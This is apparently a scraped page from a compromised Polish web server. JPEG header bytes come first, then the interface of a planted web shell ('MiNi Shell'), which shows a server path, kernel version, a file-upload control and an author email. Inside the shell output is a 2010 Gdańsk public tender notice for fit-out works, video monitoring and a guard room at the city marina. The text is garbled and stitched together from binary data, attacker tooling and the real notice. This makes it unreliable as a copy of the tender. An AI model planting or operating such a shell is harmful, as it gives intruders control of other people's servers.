JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100517/125429-N-2010.html

<p class="kh_header"><b>Gdańsk: Roboty wykończeniowe lokalu użytkowego przy ulicy Szafarnia dla potrzeb Mariny Gdańskiej</b><br>
<b>Numer ogłoszenia: 125429 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji w Gdańsku , ul. Traugutta 29, 80-221 Gdańsk, woj. pomorskie, tel. 058 524 34 73, faks 058 524 34 93.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty wykończeniowe lokalu użytkowego przy ulicy Szafarnia dla potrzeb Mariny Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zależności od części obejmuje, odpowiednio:

1) część I - wykonanie robót wykończeniowych lokalu użytkowego, obejmuje w 
    szczególności wykonanie:
    a) robót w branży budowlanej. 
    b) robót w branży elektrycznej,
    c) robót w branży sanitarnej,
    w lokalu o powierzchni ok. 180 m kwadratowych. (istniejący stan developerski)
    na potrzeb siedziby Mariny Gdańskiej.

2) część II - wykonanie systemu monitoringu wizyjnego:
    wykonanie systemu monitoringu wizyjnego obejmującego przystań jachtową.

3) część III - wykonanie pomieszczenia dla ochrony oraz furtki wejściowej na 
    przystań:
    wykonanie pomieszczenia dla ochrony oraz furtki wejściowej na przystań.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje realizację zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 PZP, do 50 % wartości zamówienia podstawowego, które polegać będą na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składając ofertę zobowiązany jest do wniesienia wadium, przed upływem terminu składania ofert, w wysokości zależnej od części zamówienia, odpowiednio:
a) dla części I dotyczącej wykonania robót wykończeniowych lokalu użytkowego
    - 10.000 zł,
b) dla części II dotyczącej wykonania systemu monitoringu wizyjnego - 5.000 zł,
c) dla części III dotyczącej wykonania pomieszczenia dla ochrony oraz furtki 
    wejściowej na przystań - 1.000 zł,
w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
    oszczędnościowokredytowej, z tym że poręczenie kasy jest zawsze poręczeniem 
    pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 
    pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju 
    Przedsiębiorczości</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dotyczący posiadania wiedzy i doświadczenia (art. 22 ust. 1 pkt. 2 PZP), jeżeli w okresie ostatnich 5 lat przed upływem terminu składania ofert, wykonał roboty, odpowiednio:

a) dla części dotyczącej wykonania robót wykończeniowych lokalu użytkowego
    - co najmniej dwie roboty wykończeniowe obejmujące branże:
    wodno-kanalizacyjną, elektryczną i budowlaną, każda na obiekcie o powierzchni 
    użytkowej min. 100 metrów kwadratowych i o wartości min. 200 tys. zł,

b) dla części dotyczącej wykonanie systemu monitoringu wizyjnego- co najmniej 
    dwie roboty polegające na wykonaniu instalacji telewizji przemysłowej, każda 
    obejmującą min. 8 sztuk kamer i o wartości min. 50 tys. zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt. 3 PZP), jeżeli dysponuje osobami które będą uczestniczyć w wykonywaniu zamówienia o kwalifikacjach, odpowiednio:

a) dla części dotyczącej wykonania robót wykończeniowych lokalu użytkowego
    - Dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, 
    posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w 
    zakresie niezbędnym do realizacji tej części zamówienia oraz niezbędne 
    doświadczenie w kierowaniu robotami budowlanymi, odpowiednio:

    1) co najmniej jedną osobą o kwalifikacjach umożliwiających pełnienie 
        obowiązków kierownika budowy, posiadającą: uprawnienia budowlane w 
        specjalności konstrukcyjno-budowlanej oraz min. dwuletnie doświadczenie w 
        kierowaniu robotami w tej specjalności.
    2) co najmniej jedną osobą o kwalifikacjach umożliwiających pełnienie 
        obowiązków kierownika robót w branży sanitarnej, posiadającą:
        uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji 
        wodociągowych i kanalizacyjnych oraz wentylacyjnych oraz min. jednoroczne 
        doświadczenie w kierowaniu robotami w tej specjalności.
    3) co najmniej jedną osobą o kwalifikacjach umożliwiających pełnienie 
        obowiązków kierownika robót w branży elektrycznej, posiadającą:
        uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji 
        elektrycznych oraz min. jednoroczne doświadczenie w kierowaniu robotami w 
        tej specjalności.

b) dla części dotyczącej wykonanie systemu monitoringu wizyjnego - 
    dysponuje co najmniej jedną sobą o kwalifikacjach umożliwiających pełnienie 
    obowiązków kierownika robót w branży elektrycznej posiadającą uprawnienia 
    budowlane w specjalności instalacyjnej w zakresie instalacji elektrycznych oraz 
    min. jednoroczne doświadczenie w kierowaniu robotami w tej specjalności.

c) dla części dotyczącej wykonania pomieszczenia dla ochrony oraz furtki 
    wejściowej na przystań - dysponuje co najmniej jedną sobą o kwalifikacjach 
    umożliwiających pełnienie obowiązków kierownika robót w branży budowlanej, 
    posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej 
    oraz min. jednoroczne doświadczenie w kierowaniu robotami w tej 
    specjalności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dotyczący sytuacji ekonomicznej i finansowej (art. 22 ust. 1 pkt. 4 PZP), jeżeli, odpowiednio:

a) dla części dotyczącej wykonania robót wykończeniowych lokalu użytkowego
    - posiada środki finansowe lub zdolność kredytową w kwocie min. 300 tys. zł.

b) dla części dotyczącej wykonanie systemu monitoringu wizyjnego - posiada 
    środki finansowe lub zdolność kredytową w kwocie min. 100 tys. zł.

c) dla części dotyczącej wykonania pomieszczenia dla ochrony oraz furtki 
    wejściowej na przystań - posiada środki finansowe lub zdolność 
    kredytową w kwocie min. 30 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Mając na uwadze dyspozycję art. 144 ust 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Istotne zmiany postanowień umownych mogą dotyczyć:

1) Wydłużenia terminu realizacji, które może nastąpić w następujących 
    przypadkach:
    a) zaistnienia siły wyższej,
    b) udzielenia zamówienia dodatkowego lub uzupełniającego,
    c) zaistnienia okoliczności niezależnych od Zamawiającego i od Wykonawcy 
        innych siła wyższa, np. zmiana przepisów prawa powodująca, że przedmiot 
        umowy lub jego część 	byłyby z nimi niezgodne, które uniemożliwiają 
        realizację przedmiotu umowy lub jego części zgodnie z umową lub uzyskania 
        celu określonego umową,
    d) zaistnienie okoliczności zależnych od Zamawiającego, które uniemożliwiają 
        realizację zobowiązania Wykonawcy zgodnie z umową.

2) Zwiększenia lub zmniejszenie wysokości wynagrodzenia, które może nastąpić w 
    przypadku ustawowej zmiany stawki podatku VAT. Zmiana może dotyczyć 
    wyłącznie nieodebranego zakresu przedmiotu umowy. Skutki finansowe 
    waloryzacji poniosą równo po połowie obie strony umowy.

3) Zmniejszenia zakresu przedmiotu umowy, które może nastąpić w następujących 
    przypadkach:
    a) zaistnienia siły wyższej,
    b) udzielenia zamówienia dodatkowego lub uzupełniającego,
    c) zaistnienia okoliczności niezależnych od Zamawiającego i od Wykonawcy 
        innych siła wyższa, np. zmiana przepisów prawa powodująca, że przedmiot 
        umowy lub jego część 	byłyby z nimi niezgodne, które uniemożliwiają 
        realizację przedmiotu umowy lub jego części zgodnie z umową lub uzyskania 
        celu określonego umową, 
    d) zaistnienie okoliczności zależnych od Zamawiającego, które uniemożliwiają 
        realizację zobowiązania Wykonawcy zgodnie z umową.
    e) konieczność usunięcia błędów lub wprowadzenia niezbędnych zmian w 
        dokumentacji projektowej na podstawie której wykonywany jest przedmiot 
        umowy.

4) Zmiany podmiotu, który został przewidziany do realizacji części umowy (na 
    zasobach którego Wykonawca polegał przy spełnianiu warunków określonych w 
    art. 22 ust. 1 PZP) lub podmiotu spośród wykonawców wspólnie ubiegających 
    się o udzielenie zamówienia w przypadku wykazania na dzień dokonania zmiany, 
    że: 
    a) nowy podmiot nie podlega wykluczeniu na podstawie art. 24 ust. 1 PZP, oraz
    b) warunki określone w ogłoszeniu o zamówieniu i SIWZ są spełnione przy 
        uwzględnieniu informacji dotyczących nowego podmiotu .

Uwaga:
Przez siłę wyższą należy rozumieć takie zdarzenie, które łącznie spełnia 
następujące kryteria: 
1) musi mieć charakter zewnętrzny, 
2) musi być niemożliwe do przewidzenia (w tym sensie, że stopień jego pojawienia 
    się jest mało prawdopodobny w określonej sytuacji przy zachowaniu 
    obiektywnych kryteriów dla oceny, czy możliwe było przewidzenie zdarzenia),
3) musi być niemożliwe do zapobieżenia. 

Siłę wyższą stanowić mogą takie zdarzenia, jak np.: zamieszki, strajki, wojny, 
anomalie spowodowane działaniem sił natury np. powodzie, trzęsienia ziemi, itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Gdańsku 80-221 Gdańsk, ul. Traugutta 29 Opłata za Specyfikację Istotnych Warunków Zamówienia - 300 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2010 godzina 11:00, miejsce: 80-221 Gdańsk, ul. Traugutta 29, Sekretariat (Ip.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie robót wykończeniowych lokalu użytkowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie robót wykończeniowych lokalu użytkowego, obejmuje w szczególności 
wykonanie:
a) robót w branży budowlanej. 
b) robót w branży elektrycznej,
c) robót w branży sanitarnej
w lokalu o powierzchni ok. 180 m kwadratowych. (istniejący stan developerski)
			na potrzeb siedziby Mariny Gdańskiej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.32.00.00-6, 45.42.11.00-5, 45.43.21.00-5, 45.44.21.00-8, 45.31.10.00-0, 45.31.20.00-7, 45.31.43.00-4, 45.31.60.00-5, 45.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie systemu monitoringu wizyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie systemu monitoringu wizyjnego obejmującego 	przystań jachtową.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.10.00-0, 45.31.20.00-7, 45.31.43.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie pomieszczenia dla ochrony oraz furtki wejściowej na przystań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie pomieszczenia dla ochrony oraz furtki wejściowej na przystań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.22.32.10-1, 45.26.12.10-9, 45.26.23.50-9, 45.42.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com